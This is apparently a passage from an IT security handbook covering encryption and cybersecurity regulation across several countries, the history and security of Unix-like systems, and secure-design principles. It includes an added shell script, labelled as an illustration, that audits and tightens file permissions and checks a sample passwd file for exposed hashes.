185 Declaration on freedom of communication on the Internet (Strasbourg, 28.05.2003) (Adopted by the Committee of Ministers at the 840th meeting of the Ministers' Deputies) http://www.coe.int/T/E/Communication_and_Research/Press/News/2003/20030528_declaration.asp

Encryption

Strong encryption is an important tool used in securing the Internet. As the European Commission noted in 2001, "The use of encryption technologies...[is] becoming indispensable, particularly with the growth in wireless access."188 Recognizing this, the general trend in national policies regarding cryptography has been to reduce or eliminate rules limiting the import, export, and use of encryption. In recent years, most developed countries, which previously sought to control encryption, have concluded that, on balance, the general availability of encryption will improve security, not interfere with it. The 1997 OECD Guidelines on Cryptography Policy and a 1998 European Commission report expressed strong support for the unrestricted availability of encryption products and services.

Based on these statements, in the late 1990s Canada, Germany, Ireland, and Finland announced national cryptography policies based on the OECD Guidelines, favoring the free use of encryption. France, which had long restricted encryption, reversed that policy in January 1999 and announced that encryption could be used in France without restrictions. In December 1997, Belgium amended its 1994 law to eliminate the provision restricting cryptography. The United States, which had sought to limit use of encryption by limiting trade in cryptographic products and services, lifted almost all restrictions on the export of encryption in 2000.189

Regulation and Legislation

In a growing number of countries, policymakers are concluding that market forces alone are not sufficient to ensure adequate mitigation of cyber-security risks. As the European Commission has noted, action by governments is required because the market offers imperfect incentives for security: market prices do not always accurately reflect the costs and benefits of investment in security; often neither providers nor users bear all the consequences of inaction; control over the Internet is dispersed and, given the complexity of networks, it may be difficult for users to assess potential dangers. Many of the critical infrastructures heavily dependent on computer systems have a long history of regulation in the public interest - regulation of safety, competition, and environmental impact, among other issues. Increasingly, regulators are adding cyber-security to the list of concerns meriting government attention.

Regulation, however, carries risks. In some respects, the Internet has flourished as a relatively unregulated communications medium. The global trend over the past two decades has been towards deregulation of communications networks generally. Competition and innovation support development of new services and technologies, drive down prices, and expand access to communications technology. When technology is rapidly changing, government regulation may hinder the adoption of innovative security solutions.

So a key question is: what are the best means to achieve the desired results of improved computer security? By and large, as a fundamental principle, government should not impose technology mandates on private sector operators of critical infrastructures. There is widespread recognition that technology mandates are likely to be ineffective and even counterproductive.
186 European Commission, Communication from the Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee on the Regions - Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime, Jan. 26, 2001, COM(2000) 890 final: http://europa.eu.int/ISPO/eif/InternetPoliciesSite/Crime/CrimeCommEN.html.

187 European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM (2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm.

188 European Commission, Communication from the Commission to the Council, the European Parliament, the Economic and Social Committee and the Committee on the Regions - Creating a Safer Information Society by Improving the Security of Information Infrastructures and Combating Computer-related Crime, Jan. 26, 2001, COM(2000) 890 final, http://europa.eu.int/ISPO/eif/InternetPoliciesSite/Crime/CrimeCommEN.html.

189 See "Cryptography and Liberty 2000: An International Survey of Encryption Policy," Electronic Privacy Information Center, http://www2.epic.org/reports/crypto2000; see also "Commercial Encryption Export Controls," Bureau of Industry and Security, U. S. Dep't of Commerce, http://www.bxa.doc.gov/Encryption/Default.htm.

Instead, one approach is to impose a general requirement to protect security. This approach was taken in Europe, growing out of the concept of privacy protection, where a general duty to protect security is imposed on all entities that collect or process personally identifiable data. Another approach is to focus only on certain economic sectors. The United States, for example, in imposing privacy obligations on the financial services and health care industries, also imposed a requirement for companies in those sectors to protect the security of personal data. Singapore has also focused on the financial services sector, but not in the context of privacy protection - Singapore's e-security guidelines for financial services firms grow directly out of security concerns, not privacy concerns. There are also different approaches to translating a general security requirement into specific security steps. One approach for government cyber-security regulation is to address processes, not technologies. Another approach is to develop guidelines. These approaches can be complementary.

Europe has started by imposing security obligations on all entities that collect and process personal information. Article 17 of the EU Data Protection Directive requires that controllers of personal information take "appropriate technical and organizational measures to protect personal data against accidental or unlawful destruction or accidental loss, alteration, unauthorized disclosure or access, in particular where the processing involves the transmission of data over a network, and against all other unlawful forms of processing."190 The Directive further states "such measures shall ensure a level of security appropriate to the risks represented by the processing and the nature of the data to be processed." Canada takes a similar approach, requiring in general terms under its Personal Information Protection and Electronic Documents Act that private sector companies take security measures to protect personal information they hold.

The European Union has issued a somewhat more detailed directive specifically addressing obligations regarding the protection of information in the electronic communications industry.191 Article 4 specifies that a provider of electronic communications services must take steps to safeguard the security of "its services, as opposed to personal data, if necessary in conjunction with the provider of the public communications network with respect to network security." Second, providers of publicly available electronic communications must inform subscribers of a particular risk of a breach of security, and "where the risk lies outside the scope of the measures to be taken by the service provider, of any possible remedies, including an indication of the likely costs involved."192

How should these general requirements be translated into practice? Singapore offers one model, where the Monetary Authority of Singapore (MAS) has spelled out a comprehensive set of cyber-security recommendations in its Technology Risk Management Guidelines for Financial Institutions.193 The guidelines are aimed at promoting sound processes in managing technology risks and the implementation of security practices, but they are not mandatory. Instead, as the guidelines state, "MAS intends to incorporate these guidelines into supervisory expectations for the purpose of assessing the adequacy of technology risk controls and security measures adopted by financial institutions. Each institution can expect that MAS will take a keen interest as to how and what extent it has achieved compliance with these guidelines...Financial institutions are encouraged to use their best endeavors to ensure compliance with these guidelines."194 The guidelines are careful to state that they do not affect and should not be regarded as a statement of the standard of care that institutions owe to their customers.195 An appendix lists security practices for financial institutions, stating that financial institutions "should" adopt the practices.

190 Directive 95/46/EC of the European Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing of personal data and on the free movement of such data, Official Journal L 281/31, Nov. 23, 1995, http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=EN&numdoc=31995L0046&model=guichett.

191 Directive 2002/58/EC of the European Parliament and of the Council of 12 July 2002 concerning the processing of personal data and the protection of privacy in the electronic communications sector, Article 4(1), Official Journal L 201/37, July 31, 2002, at 37-47, http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=en&numdoc=32002L0058&model=guichett. Also available at http://europa.eu.int/comm/internal_market/privacy/law_en.htm.

192 Id. at Article 4(2).

193 Technology Risk Management Guidelines for Financial Institutions, Monetary Authority of Singapore, Draft Nov. 11, 2002, http://www.mas.gov.sg/display.cfm?id=94D063CD-5EB6-4636-82B5A725F9F6E9F5

194 Id., para. 7.0.1, p. 11.

195 Id. at p. 25.
The practices include the following guidelines:

· Systems software and firewalls should be configured to the highest security settings consistent with the level of protection required, keeping abreast of enhancements, updates and patches recommended by system vendors;
· All default passwords for new systems should be changed immediately upon installation as they are mostly known by intruders at large;
· Firewalls should be installed between internal and external networks as well as between geographically separate sites; and
· Anti-virus software should be implemented.196

The United States has taken a different approach, focusing on processes, not technological practices. Thus, the Financial Services Modernization Act of 1999 (known popularly by its lead sponsors in the Congress as the Gramm-Leach-Bliley Act) recognized that "each financial institution has an affirmative and continuing obligation to respect the privacy of its customers and to protect the security and confidentiality of those customers' nonpublic personal information."197 Under the Act, regulators of financial institutions were required to issue regulations for administrative, technical, and physical safeguards for information security.198 The crucial point is this: the regulations that were issued do not say what the technical components of a safeguards program must be. Instead the regulations leave it up to the businesses to decide what specific security measures are best for them.

Under the Act, the rules issued by the regulatory agencies for the financial services industry require banks to adopt security plans. The rules do not state what technical measures those plans must contain. The security program must:

· Identify reasonably foreseeable internal and external threats that could result in unauthorized disclosure, misuse, alteration, or destruction of customer information or customer information systems;
· Assess the likelihood and potential damage of these threats, taking into consideration the sensitivity of customer information; and
· Assess the sufficiency of policies, procedures, customer information systems, and other arrangements in place to control risk.199

Information security programs must be designed to control risks, commensurate with the sensitivity of the information and the complexity and scope of activities. The regulations require that certain fairly broad categories of security measures must be considered and, if appropriate, adopted:

· access controls on customer information systems (authentication and authorization);
· access restrictions at physical locations;
· encryption of electronic customer information;
· change management procedures;
· dual control procedures (segregation of duties and background checks) for employees with access to customer information;
· intrusion monitoring systems;
· intrusion response programs; and
· measures to protect against destruction, loss, or damage of customer information.

Additionally, under the regulations, staff must be trained in the implementation of the security program. Regular testing of the key controls, systems, and procedures must take place, with appropriate adjustments made to account for relevant changes in technology, the sensitivity of customer information, internal or external threats to information, and changing business arrangements, such as mergers and acquisitions, alliances and joint ventures, and outsourcing arrangements.200 The rules also require the Boards of Directors of financial institutions to approve their institutions' written security programs and oversee the development, implementation, and maintenance of the program, including assigning specific responsibility for implementation and reviewing reports from management.

196 Id., Appendix C, p. 21. For further information on financial security, see Thomas Glaessner, Tom Kellermann, and Valerie McNevin, Electronic Security: Risk Mitigation in Financial Transactions--Public Policy Issues, The World Bank, June 2002, http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/(attachmentweb)/E-security-RiskMitigationversion3/$FILE/E-security-Risk+Mitigation+version+3.pdf; Thomas Glaessner, Tom Kellermann, and Valerie McNevin, Electronic Security: Risk Mitigation in Financial Transactions--Summary of Recent Research and Global Dialogues, The World Bank, May 2003, http://www.worldbank.org/wbi/B-SPAN/sub_e-security.htm

197 Gramm-Leach-Bliley Act, Title 15, United States Code, section 6801.

198 Gramm-Leach-Bliley Act, Title 15, United States Code, section 6805.

199 "Appendix B to Part 570--Interagency Guidelines Establishing Standards for Safeguarding Customer Information," Part III, http://www.occ.treas.gov/fr/fedregister/66fr8616.htm.

200 Id.

Similar rules issued by the Federal Trade Commission require that financial institutions under its purview must develop a plan in which the institution must:

(1) designate one or more employees to coordinate the safeguards;
(2) identify and assess the risks to customer information in each relevant area of the company's operation, and evaluate the effectiveness of the current safeguards for controlling these risks;
(3) design and implement a safeguards program, and regularly monitor and test it;
(4) select appropriate service providers and contract with them to implement safeguards; and
(5) evaluate and adjust the program in light of relevant circumstances, including changes in the firm's business arrangements or operations, or the results of testing and monitoring of safeguards.201

A similar approach can be seen in the United States' Health Insurance Portability and Accountability Act of 1996 (HIPAA), which requires healthcare institutions to institute security measures to ensure patient information that is stored electronically remains confidential and free from unauthorized access.202 The security rule adopted under the Act requires the maintenance of reasonable and appropriate administrative, physical, and technical safeguards to protect the integrity and confidentiality of personal medical information and to protect against reasonably anticipated threats or hazards to the security or integrity of medical data or its unauthorized use or disclosure.203 The rule applies to data both while in storage and in transit. It has 28 "standards" and 41 "implementation specifications."204 It states that security practices should take into account technical capabilities of record systems, costs of security measures, the need for personnel training, and the value of audit trails in computerized record systems. The security rule identifies safeguards that are "required" and those that are "addressable."

The core principles of the Security Rule require covered entities to:

· Ensure the confidentiality, integrity, and availability of all electronic protected health information the covered entity creates, receives, maintains, or transmits.
· Protect against any reasonably anticipated threats or hazards to the security or integrity of such information.
· Protect against any reasonably anticipated uses or disclosures of such information that are not required under the Security Rule.
· Ensure compliance with the Security Rule by its workforce.205

The Rule, however, allows flexibility:

· Covered entities may use any security measures that allow the covered entity to reasonably and appropriately implement the standards and implementation specifications.
· In deciding which security measures to use, a covered entity must take into account the following factors:
(i) The size, complexity, and capabilities of the covered entity.
(ii) The covered entity's technical infrastructure, hardware, and software security capabilities.
(iii) The costs of security measures.
(iv) The probability and criticality of potential risks to electronic protected health information.206

201 See "Financial Institutions and Customer Data: Complying with the Safeguards Rule," http://www.ftc.gov/bcp/conline/pubs/buspubs/safeguards.htm; see also Standards for Safeguarding Customer Information, 67 Fed. Reg. 36484-94, May 23, 2000 (codified at 16 Code of Federal Regulations Part 314), http://www.ftc.gov/os/2002/05/67fr36585.pdf.

202 45 Code of Federal Regulations sections 160, 162, 164; http://www.cms.hhs.gov/hipaa/hipaa2/regulations/security/default.asp

203 See HIPAA, Title 42, United States Code section 1320d-2(d)(2).

204 Linda A. Malek and Brian R. Krex, "HIPAA's security rule becomes effective 2005," The National Law Journal, Mar. 31, 2003 at B14.

205 45 Code of Federal Regulations Section 164.306(a).

Another approach is to require companies to publicly disclose vulnerabilities and breaches, both in order to inform the public and to prompt system operators to improve security.
EU law obligates the providers of publicly available telecommunications services to inform their subscribers of particular risks of a breach of security of the network and any possible remedies, including the costs involved. For example, in the State of California, a law took effect on July 1, 2003 requiring any company that owns, licenses, or maintains personal information of California residents to notify those residents if a security breach enables an unauthorized person to gain access to the residents' personal information.207

206 45 Code of Federal Regulations Section 164.306(b).
207 Security Breach Information Act (SB 1386), added to the California Civil Code as Section 1798.29; Thomas J. Smedinghoff, "Cybersecurity Disclosure Requirements: A New Trend?" Baker & McKenzie, Chicago (October 3, 2003), http://www.bmck.com/ecommerce/cybersecurity-disclosure-requirements.pdf.

PART FIVE: IT SECURITY FOR TECHNICAL ADMINISTRATORS

CHAPTER 1. BACKGROUND
CHAPTER 2. SECURITY FOR ADMINISTRATORS
CHAPTER 3. PHYSICAL SECURITY
CHAPTER 4. INFORMATION SECURITY
CHAPTER 5. IDENTIFICATION AND AUTHENTICATION
CHAPTER 6. SERVER SECURITY
CHAPTER 7. NETWORK SECURITY
CHAPTER 8. ATTACKS AND DEFENSES
CHAPTER 9. DETECTING AND MANAGING A BREAK-IN
CHAPTER 10. SYSTEM-SPECIFIC GUIDELINES

CHAPTER 1. BACKGROUND

Summary of Parts 1-4

As we turn to the most technical Part of the Handbook, it will be useful to review what we have already discussed in Parts 1-4. As you will recall, Part 1 of this publication provided an introduction to the general issues of security in an electronic age. The section described the scope of IT security issues, explained some types of malicious behavior with respect to computers and networks, and outlined why security policies and procedures are essential for individuals and enterprises of all types.
Part 2 addressed the common concerns of individual users of computing and networking resources. It explained the key security issues that pertain to individual users and offered guidelines on techniques that, when properly employed, will minimize the threat of a security penetration.

Part 3 covered the administrative and policy aspects of security from an organizational point of view. Through opportunities presented by the new digital media, small and medium-sized enterprises (SMEs) in developing countries are moving into position to compete on a level playing field in the current expansion of the global markets. Good security policy and effective implementation of security procedures will minimize the risk of accidental and deliberate losses and provide the tools to identify attacks and to repair security breaches. In the SME context, security policy should also include elements such as an authentication policy for users of interactive application areas such as e-business, e-commerce, and e-government. This part makes suggestions on how solid security policies may be developed and deployed in a range of organizational environments.

Part 4 focuses on security issues and legislative initiatives that need to be understood and handled at the governmental level. In addition to securing its own information assets, a government has an obligation to set policy for securing and protecting the national information infrastructure. Governments also need to envision how the growth of the information infrastructure will affect their legal systems. Part 4 outlines some of the key questions facing policy makers and leaders in the developing world and offers examples of policies from the international community that may serve as guidance for those engaged in new regulatory efforts concerning cyberspace.

Summary of Part 5 with Note on Technical Background

Part 5 is aimed at helping system and network administrators perform their duties efficiently.
It provides detailed information on security issues that need to be understood and addressed at a highly technical level, including:
· classifying specific threats to security, including methods of attack that are used to penetrate systems and programs;
· monitoring critical systems and network traffic so that attempted intrusions can be detected and, when possible, rejected;
· assessing the results of security evaluations while policies and procedures are being developed, and analyzing logs and other ongoing documentation once those security measures have been implemented;
· handling a break-in, recovering from the security breach, and learning from the experience.

Part 5 differs from the other four Parts of this Handbook in that it assumes a certain level of technical knowledge on the part of the reader. While concepts have been explained clearly and examples given whenever possible, this section is designed for people with a fair amount of experience with (or at least a very strong interest in) systems and their administration. There is a great deal of material to cover in this section, and readers are strongly encouraged to make use of the Annexes, which point to many respected references in the field of computer and network maintenance.

Since security issues often depend upon the operating environment of the computer, Part 5 provides subsections that address well-known security issues associated with the major operating systems in use today. Although the majority of Part 5 is system-independent wherever possible, pointers are offered on Microsoft Windows NT-based operating systems and on Unix, Linux, MacOS X, and other variations of desktop Unix. In all cases, there are clear recommendations regarding the actions that can and should be taken to avoid compromise of system resources.
UNIX

There are several different (sometimes quite different) Unix or Unix-like operating systems, distributed by many different vendors. The reasons for this, and its implications, require a brief historical review.

The roots of Unix go back to the Multics project of the mid-1960s. The project, heavily funded by the U.S. Department of Defense Advanced Research Projects Agency (ARPA or DARPA), was designed to be a modular system built from banks of high-speed processors, memory, and communications equipment. By design, parts of the computer could be shut down for service without affecting other parts or the users. Although this level of processing is simply assumed today, such a capability was not available when Multics was begun. Multics was designed both to be resistant to external attacks and to protect the users on the system from each other: Multics was to support the concept of multilevel security. Multics eventually provided a level of security and service that is still unequaled by many of today's computer systems.

Whereas Multics tried to do many things, Unix tried to do one thing well: run programs. Strong security was not part of this goal. The system was based on compact programs, called tools, each of which performed a single function. American Telephone and Telegraph (AT&T) added tools and features throughout the 1970s. In 1973, Thompson rewrote most of Unix in Ritchie's newly invented C programming language. C was designed to be a simple, portable language. Programs written in C could be moved easily from one kind of computer to another--as was the case with programs written in other high-level languages like FORTRAN--yet they ran nearly as fast as programs coded directly in a computer's native machine language. By 1977, more than 500 sites were running the operating system; 125 sites were at universities in the United States and more than 10 foreign countries.
Development continued in different locations, including the University of California at Berkeley, which released the "Berkeley Software Distribution (BSD)," a collection of programs and modifications to the Unix system. Over the next six years, in an effort funded by ARPA, the so-called BSD Unix grew into an operating system of its own that offered significant improvements over AT&T's. Perhaps the most important of the Berkeley improvements was in the area of networking, which made it easy to connect Unix computers to local area networks (LANs). For all of these reasons, the Berkeley version of Unix became very popular with the research and academic communities.

As Unix started to move from the technical to the commercial markets in the late 1980s, the conflict between operating system versions based on AT&T Unix and those based on BSD was beginning to cause problems for all vendors. Commercial customers wanted a standard version of Unix, hoping that it could cut training costs and guarantee software portability across computers made by different vendors. And the nascent Unix applications market wanted a standard version, believing that this would make it easier for them to support multiple platforms, as well as compete with the growing PC-based market.

In May 1988, seven of the industry's Unix leaders--Apollo Computer, Digital Equipment Corporation, Hewlett-Packard, IBM, and three major European computer manufacturers--announced the formation of the Open Software Foundation (OSF). The goal of OSF was to wrest control of Unix away from AT&T alone and put it in the hands of a not-for-profit industry coalition, which would be chartered with shepherding the future development of Unix and making it available to all under uniform licensing terms.
OSF decided to base its version of Unix on IBM's implementation, then moved to the Mach kernel from Carnegie Mellon University and an assortment of Unix libraries and utilities from HP, IBM, and Digital. Although the result of that effort was not widely adopted or embraced by all the participants, the OSF concept generated further development activity.

GNU

Richard Stallman, a programmer with the MIT Artificial Intelligence Laboratory's Lisp Machine Project, was tremendously upset when the companies that were founded to commercialize the research adopted rules prohibiting the free sharing of software. Stallman realized that if he wanted to have a large community of people sharing software, he couldn't base it on specialty hardware manufactured by only a few companies and running only LISP. So instead, he decided to base a new software community on Unix, a powerful operating system that looked like it had a future. He called his project GNU, a recursive acronym meaning "GNU's Not Unix!"

To Stallman, being "free" wasn't simply a measure of price; it was also a measure of freedom. Being free meant that he was free to inspect and make changes to the source code, and that he was free to share copies of the program with his friends. He wanted free software -- as in free speech, not free beer. By 1985, GNU's first major product, the Emacs text editor, had grown to the point that it could be readily used by people other than Stallman. Stallman next started working on a free C compiler, GNU C. Both of these programs were distributed under Stallman's GNU General Public License (GPL). This license gave developers the right to distribute the source code and to make their own modifications, provided that all future modifications were released in source code form and under the same license restrictions.
That same year, Stallman founded the Free Software Foundation, a non-profit foundation that solicited donations and used them to hire programmers who would write freely redistributable software.

Minix and Linux

At roughly the same time that Stallman started the GNU project, professor Andrew S. Tanenbaum decided to create his own implementation of the Unix operating system to be used in teaching and research. As all of the code would be original, he would be free to publish the source code in his textbook and distribute working operating systems without paying royalties to AT&T. The system, Minix, ran on IBM PC AT clones equipped with Intel processors and was designed around them. The project resulted in a stable, well-documented software platform and an excellent operating system textbook. However, efficiency was not a design criterion for Minix, and coupled with the copyright issues associated with the textbook, Minix did not turn out to be a good choice for widespread, everyday use.

In 1991, a Finnish computer science student named Linus Torvalds decided to create a free version of the Unix operating system that would be better suited to everyday use. Starting with the Minix code set, Torvalds reimplemented the kernel and file system himself, piece by piece, until he had a new system that had none of Tanenbaum's original code in it. Torvalds named the resulting system "Linux" and decided to license and distribute it under Stallman's GPL. By combining his system with other freely available tools, notably the C compiler and editor developed by the Free Software Foundation's GNU project and the X Consortium's window server, Torvalds was able to create an entire working operating system. Work on Linux continues to this day by hundreds of contributors.
NetBSD, FreeBSD, and OpenBSD

In 1988 the Berkeley Computer Systems Research Group (CSRG) started on a project to eliminate all AT&T code from their operating system. First available in June 1989, Networking Release 1 consisted of Berkeley's TCP/IP implementation and the related utilities. It was distributed on tape for a cost of $1,000, although anyone who purchased it could do anything that he wanted with the code, provided that the original copyright notice was preserved. Several large sites put the code up for anonymous FTP; the Berkeley code rapidly became the base of many TCP/IP implementations throughout the industry.

An interim release named 4.3BSD-Reno occurred in early 1990; a second interim release, Networking Release 2, occurred in June 1991. This system was a complete operating system except for six remaining files in the kernel that contained AT&T code and had thus not been included in the operating system. In the fall of 1991, Bill Jolitz wrote those files for the Intel processor and created a working operating system called 386/BSD. Within a few months a group of volunteers committed to maintaining and expanding the system formed and christened their effort "NetBSD."

The NetBSD project soon splintered. Some of the members decided that the project's primary goal should be to support as many different platforms as possible and to continue to do operating system research. But another group of developers thought that they should devote their resources to making the system run as well as possible on the Intel 386 platform and making the system easier to use. This second group split off from the first and started the FreeBSD project. A few years later, a second splinter group broke off from the NetBSD project. This group decided that security and reliability were not getting the attention they should.
The focus of this group was on careful review of the source code to identify potential problems. They restricted adoption of new code and drivers until they had been thoroughly vetted for quality. This third group adopted the name "OpenBSD."

Businesses Adopt Unix

As a result of monopolistic pricing on the part of Microsoft and the security and elegance of the Unix operating systems, many businesses have developed a renewed interest in adopting a Unix base for some commercial products. A number of network appliance vendors found the stability and security of the OpenBSD platform to be appealing, and they adopted it for their projects. Other commercial users, especially many early web hosting firms, found the stability and support options offered by BSDI to be attractive, and they adopted BSD/OS. Several universities also adopted BSD/OS because of favorable licensing terms for students and faculty when coupled with the support options. Meanwhile, Linux became extremely popular among individuals seeking an alternative OS for their PCs. Although OpenBSD was likely a more secure and stable operating system at the time, Linux provided support for a much larger base of hardware, and was somewhat easier to install and operate.

Another key influence in the mid-to-late 1990s occurred when researchers at various national laboratories, universities, and NASA began to experiment with cluster computing. With cluster computing, scores (or hundreds) of commodity PCs were purchased, placed in racks, and connected with high-speed networks. Instead of running one program really fast on one computer, big problems were broken into manageable chunks that were run in parallel on the racked PCs. This approach, although not appropriate for all problems, often worked better than using high-end supercomputers. Furthermore, it was often several orders of magnitude less costly. One of the first working systems of this type, named Beowulf, was based on Linux.
Because of the code sharing and mutual development of the supercomputing community, Linux quickly spread to other groups around the world wishing to do similar work.

All of this interest, coupled with growing unease with Microsoft's de facto monopoly of the desktop OS market, caught the attention of two companies -- IBM and Dell -- both of which announced commercial support for Linux. Around the same time, two companies devoted to the Linux operating system -- Red Hat and VA Linux -- had two of the most successful Initial Public Offerings in the history of the US stock market. Shortly thereafter, HP announced a supported version of Linux for their systems.

Today, many businesses and research laboratories run on Linux. They use Linux to run web servers, mail servers, and, to a lesser extent, as a general desktop computing platform. Instead of purchasing supercomputers, businesses create large Linux clusters that can solve large computing problems via parallel execution. FreeBSD, NetBSD, and OpenBSD are similarly well-suited to these applications, and are also widely used. However, based on anecdotal evidence, Linux appears to have a larger installed base of users than any one of the other systems. Based on announced commercial support, including ventures by Sun Microsystems, Linux seems better poised to grow in the marketplace. Nonetheless, because of issues of security and performance (at least), we do not expect the *BSD variants to fade from the scene; as long as the *BSD camps continue separate existences, however, it does seem unlikely that they will gain on Linux market share.

There are several versions of the Linux and BSD operating systems that will boot off a single floppy. These versions, including Trinux, PicoBSD, and ClosedBSD, are designed for applications where high security is required, including forensics, recovery, and network appliances.
Security and Unix

Like Windows NT-based systems, Unix is a multi-user, multi-tasking operating system. Multi-user means that the operating system allows many different people to use the same computer at the same time. Multi-tasking means that each user can run many different programs simultaneously. One of the natural functions of such operating systems is to prevent different people (or programs) using the same computer from interfering with each other. Without such protection, a wayward program could affect other programs or other users, could accidentally delete files, or could even crash (halt) the entire computer system. To keep such disasters from happening, some form of computer security has always had a place in the Unix design philosophy.

Unix security provides more than mere memory protection. Unix has a sophisticated security system that controls the ways users access files, modify system databases, and use system resources. Unfortunately, those mechanisms don't help much when the systems are misconfigured, are used carelessly, or contain buggy software. Nearly all of the security holes that have been found in Unix over the years have resulted from these kinds of problems rather than from shortcomings in the intrinsic design of the system. Thus, nearly all Unix vendors believe that they can (and perhaps do) provide a reasonably secure Unix operating system. We believe that Unix systems can be fundamentally more secure than other common operating systems. However, there are influences that work against better security in the Unix environment.

Expectations

The biggest problem with improving Unix security is arguably one of expectations. Many users have grown to expect Unix to be configured in a particular way. Their experience with Unix in academic, hobbyist, and research settings has always been that they have access to most of the directories on the system and that they have access to most commands.
Users may be accustomed to making their files world-readable by default. Users are also often accustomed to being able to build and install their own software, often requiring system privileges to do so.

Unfortunately, all of these expectations are contrary to good security practice. To have stronger security, system administrators must often curtail access to files and commands that are not strictly needed for users to do their jobs. Thus, someone who needs e-mail and a text processor for his work should not also expect to be able to run the network diagnostic programs and the C compiler. Likewise, to heighten security, users should not be able to install software that has not been examined and approved by a trained and authorized individual.

Administrators can strengthen security by applying some general security principles, in moderation. For instance, rather than removing all compilers and libraries from each machine, these tools can be protected so that only users in a certain user group can access them. Users with a need for such access, and who can be trusted to take due care, can be added to this group. Similar methods can be used with other classes of tools, too, such as network monitoring software or Usenet news programs.

Furthermore, changing the fundamental view of data on the system (from readable by default to unreadable by default) can be beneficial. For instance, user files and directories should be protected against read access instead of being world-readable by default. Setting file access control values appropriately, and using shadow password files, are two examples of how this simple change in system configuration can improve the overall security of Unix.

The most critical aspect of enhancing Unix security is to get users themselves to participate in the alteration of their expectations.
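As an added illustration of the configuration changes recommended above (this is example code, not part of the Handbook), the following POSIX shell helpers audit a directory tree for world-readable files, restrict a tool such as a compiler to one group instead of deleting it, and check a passwd-format file for password fields that have not been moved to a shadow file. The directory tree, the file names and the sample passwd content are constructed for the demonstration, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the Handbook): audit helpers for the two changes the
# text recommends on a Unix host, namely making user files unreadable by
# default and keeping password hashes out of the world-readable passwd file.
# Every path and the sample passwd content below are constructed for the demo.

# List regular files under directory $1 that any user on the system can read
# (the "other" read bit is set). POSIX find accepts the symbolic -perm -o=r test.
find_world_readable() {
    find "$1" -type f -perm -o=r
}

# Number of such files as a bare integer (tr strips BSD wc's padding).
count_world_readable() {
    find_world_readable "$1" | wc -l | tr -d ' '
}

# Strip all "other" access under $1 so only the owner and the owning group can
# read, write or traverse it: the "unreadable by default" stance.
restrict_tree() {
    chmod -R o-rwx "$1"
}

# Limit a tool such as a compiler ($1) to members of group $2, as the text
# suggests, rather than removing it: owner and group keep execute, others lose
# all access.
restrict_tool_to_group() {
    chgrp "$2" "$1" && chmod 0750 "$1"
}

# Print the login names in a passwd-format file ($1) whose password field is
# not a shadow placeholder ("x", "*" or "!"). Such entries expose either a
# hash or an empty (passwordless) field to every local user; with shadow
# passwords in use this prints nothing.
unshadowed_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" { print $1 }' "$1"
}

# Build a constructed demo tree: one file created under the permissive umask
# 022 common in academic setups, one under the restrictive umask 077, plus a
# sample passwd file in which one legacy account still carries its hash.
make_demo() {
    dir=$(mktemp -d)
    ( umask 022; echo "lecture notes" > "$dir/shared.txt" )
    ( umask 077
      echo "private draft" > "$dir/private.txt"
      printf '%s\n' \
          'root:x:0:0:root:/root:/bin/sh' \
          'alice:x:1001:1001:Alice:/home/alice:/bin/sh' \
          'legacy:$1$constructedhash$:1002:1002:Old account:/home/legacy:/bin/sh' \
          > "$dir/passwd.sample" )
    echo "$dir"
}

# Demo run: audit, harden, audit again, then clean up.
d=$(make_demo)
echo "world-readable files before hardening: $(count_world_readable "$d")"
echo "accounts with an exposed password field: $(unshadowed_accounts "$d/passwd.sample")"
restrict_tree "$d"
echo "world-readable files after hardening:  $(count_world_readable "$d")"
rm -rf "$d"
```

On a real host the same functions would be pointed at home directories, at /usr/bin/cc with a group such as "developers", and at /etc/passwd; the audit functions only read, while restrict_tree and restrict_tool_to_group change modes and should be run deliberately, not over system directories wholesale.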
Not surprisingly, this advice also applies to enhancing the security of NT-based systems when users are accustomed to Microsoft's "personal" operating systems prior to NT. The best way to meet this goal is not by decree, but through education, awareness, and motivation. Technical security measures are crucial, but experience has proven repeatedly that people problems are not amenable to technological solutions. Many users started using computers in an environment that was less threatening than the one they face today. By educating users about the dangers and how their cooperation can help to thwart those dangers, the security of the system is increased. By properly motivating users to participate in good security practice, you make them part of the security mechanism. Education and motivation work well only when applied together, however; education without motivation may mean that security measures are not actually applied, and motivation without education leaves gaping holes in what is done.

CHAPTER 2. SECURITY FOR ADMINISTRATORS

At a Glance

This chapter provides an operational definition of security for administrators, discusses the design of secure systems, and explains who attacks computer systems. Some typical attacker tools are enumerated, and a case study of an attack is developed.

Security for Administrators

As a technical administrator, you're responsible for ensuring that the systems you manage do what they're supposed to do. Although there are many formal definitions of security, a useful operational definition for administrators is: A computer is secure if you can depend on it and its software to behave as you expect. If you expect the data entered into your machine today to be there in a few weeks, and to remain unread by anyone who is not supposed to read it, then the machine is secure. Security, then, is a critical function of every administrator's role.
By this definition, natural disasters and buggy software are as much threats to security as unauthorized users are.

Bad Code

Designing secure computing systems and software isn't easy. In 1975, Jerome Saltzer and M. D. Schroeder described seven criteria for building such systems. They are:

Least privilege: Every user and process should have the least set of access rights necessary. Least privilege limits the damage that can be done by malicious attackers and errors alike. Access rights should be explicitly required, rather than given to users by default.

Economy of mechanism: The design of the system should be small and simple so that it can be verified and correctly implemented.

Complete mediation: Every access should be checked for proper authorization.

Open design: Security should not depend upon the ignorance of the attacker. This criterion precludes back doors in the system that give access to users who know about them.

Separation of privilege: Where possible, access to system resources should depend on more than one condition being satisfied.

Least common mechanism: Users should be isolated from one another by the system. This limits both covert monitoring and cooperative efforts to override system security mechanisms.

Psychological acceptability: The security controls must be easy to use so that they will be used and not bypassed.

Unfortunately, designers often never learn these criteria, forget them, take shortcuts, or decide they're not important enough to bother with. As a result, there are many poorly-designed but widely-used operating systems, algorithms, and applications, including software that purports to be part of the security infrastructure of a system. Bad design leads to bugs and unforeseen side effects, which may cause accidental damage to your systems or information, or may be exploited intentionally by an attacker.

Free vs. Proprietary Software

